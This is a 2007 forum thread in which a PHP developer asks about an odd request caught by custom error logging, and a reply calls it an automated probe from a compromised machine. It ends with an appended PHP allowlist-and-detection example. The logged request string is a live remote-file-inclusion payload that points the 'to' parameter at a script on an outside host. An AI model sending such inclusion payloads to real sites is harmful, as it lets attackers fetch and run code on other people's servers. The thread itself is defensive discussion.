Security vulnerability question

on 10.10.2007 21:10:48 by phpCodeHead

In my code, the 'to' parameter should have a value of ?to=sales or
?to=engineering, generated through a hypertext link. Although manually
entered parameter values such as ?to=getAllCustCreditCardNums or
?to=anyOtherJibberish have been coded to accomplish absolutely nothing,
I have been intrigued by an error report received through customized
error reporting code in the app. It reports an error event in which a
URL was manually entered as the value of 'to'. The error report
returns global array values at the time of the error. .... and it is all
because I "failed" to initialize a variable... :)

My question(s) is ...
What is being attempted here?
Is this a new exploit attempt?

I know how to stop it by filtering input through regular expressions,
but it has me curious nonetheless...

These are the values returned from the _ENV array on error:

[_ENV] => Array
(
    [HTTP_USER_AGENT] => Wget/1.1 (compatible; i486; Linux; RedHat7.3)
    [SERVER_PORT] => 80
    [HTTP_HOST] => www.mydomain.com
    [DOCUMENT_ROOT] => /home/myusrname/public_html
    [SCRIPT_FILENAME] => /home/myusrname/public_html/index.php
    [REQUEST_URI] => /index.php?p=email&to=http://ninaru.hut2.ru/images/cs.txt?
    [SCRIPT_NAME] => /index.php
    [HTTP_CONNECTION] => keep-alive
    [REMOTE_PORT] => 6519
    [PATH] => /usr/local/bin:/usr/bin:/bin
    [PWD] => /home/myusrname/public_html
    [SERVER_ADMIN] => webmaster@mydomain.com
    [REDIRECT_STATUS] => 200
    [REDIRECT_QUERY_STRING] => p=email&to=http://ninaru.hut2.ru/images/cs.txt?
    [HTTP_ACCEPT] => text/html, */*
    [REMOTE_ADDR] => 85.201.107.41
    [SHLVL] => 0
    [SERVER_NAME] => www.bizflowdesigns.com
    [SERVER_SOFTWARE] => ''
    [QUERY_STRING] => p=email&to=http://ninaru.hut2.ru/images/cs.txt?
    [SERVER_ADDR] => 66.29.78.37
    [GATEWAY_INTERFACE] => CGI/1.1
    [SERVER_PROTOCOL] => HTTP/1.1
    [REDIRECT_URL] => /index.php
    [CONTENT_TYPE] => text/html
    [REQUEST_METHOD] => GET
    [ORIG_PATH_TRANSLATED] => /home/myusrname/public_html/index.php
    [ORIG_PATH_INFO] => /index.php
    [ORIG_SCRIPT_NAME] => /index.php?p=email&to=http://ninaru.hut2.ru/images/cs.txt?
    [ORIG_SCRIPT_FILENAME] => /home/myusrname/public_html/index.php
)

Thanks for any insight....

Re: Security vulnerability question

on 10.10.2007 21:38:49 by Good Man

phpCodeHead wrote in
news:1192043448.321346.169560@y42g2000hsy.googlegroups.com:

> In my code, the 'to' parameter should have a value of ?to=sales or
> ?to=engineering, generated through a hypertext link. Although manually
> entered parameter values such as ?to=getAllCustCreditCardNums or
> ?to=anyOtherJibberish have been coded to accomplish absolutely nothing,
> I have been intrigued by an error report received through customized
> error reporting code in the app. It reports an error event in which a
> URL was manually entered as the value of 'to'. The error report
> returns global array values at the time of the error. .... and it is all
> because I "failed" to initialize a variable... :)
>
> My question(s) is ...
> What is being attempted here?
> Is this a new exploit attempt?

It looks like a Red Hat machine was compromised by a script (kiddie), and
that machine is trying to find further exploits on other machines (like
yours!)

It's not particularly new; it seems lots of people are getting it:
http://www.google.ca/search?q=hut2.ru+cs.txt
http://security.pigstye.net/staticpages/index.php/index

As long as your script is correctly coded to ignore anything other than
what you're expecting it to get (as you have done), there's nothing to
worry about.
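
Added example, not code from the thread: one way to "ignore anything other than what you're expecting" is an exact-match allowlist, so the 'to' value is only ever a lookup key and never reaches an include, a file path or a mail header. The recipient addresses, function names and sample inputs are hypothetical, and the code assumes PHP 7.1 or later.

```php
<?php
// Added example, not code from the thread. Addresses and function
// names are hypothetical.

// Fixed map: the request value is used only as a lookup key.
const RECIPIENTS = [
    'sales'       => 'sales@example.com',
    'engineering' => 'engineering@example.com',
];

/** Resolve 'to' to a recipient address, or null if it is not an expected key. */
function resolve_recipient(array $query): ?string
{
    $to = $query['to'] ?? null;
    // ?to[]=x arrives as an array; anything that is not a string is rejected.
    if (!is_string($to)) {
        return null;
    }
    // Exact match against the known keys; no pattern matching involved.
    return RECIPIENTS[$to] ?? null;
}

/** Flag values that look like a URL or path, so the error report can say so. */
function looks_like_inclusion_probe(string $value): bool
{
    return preg_match('#^[a-z][a-z0-9+.\-]*://#i', $value) === 1
        || strpos($value, '../') !== false
        || strpos($value, "\0") !== false;
}

// Constructed sample inputs; the URL is a placeholder, not the one in the log.
$samples = [
    ['to' => 'sales'],
    ['to' => 'http://untrusted.example/cs.txt?'],
    ['to' => ['sales']],
    [],
];
foreach ($samples as $query) {
    $recipient = resolve_recipient($query);
    $raw       = $query['to'] ?? '';
    $probe     = is_string($raw) && looks_like_inclusion_probe($raw);
    printf(
        "%-45s => %s%s\n",
        json_encode($query, JSON_UNESCAPED_SLASHES),
        $recipient ?? 'rejected',
        $probe ? ' (URL or path in parameter)' : ''
    );
}
```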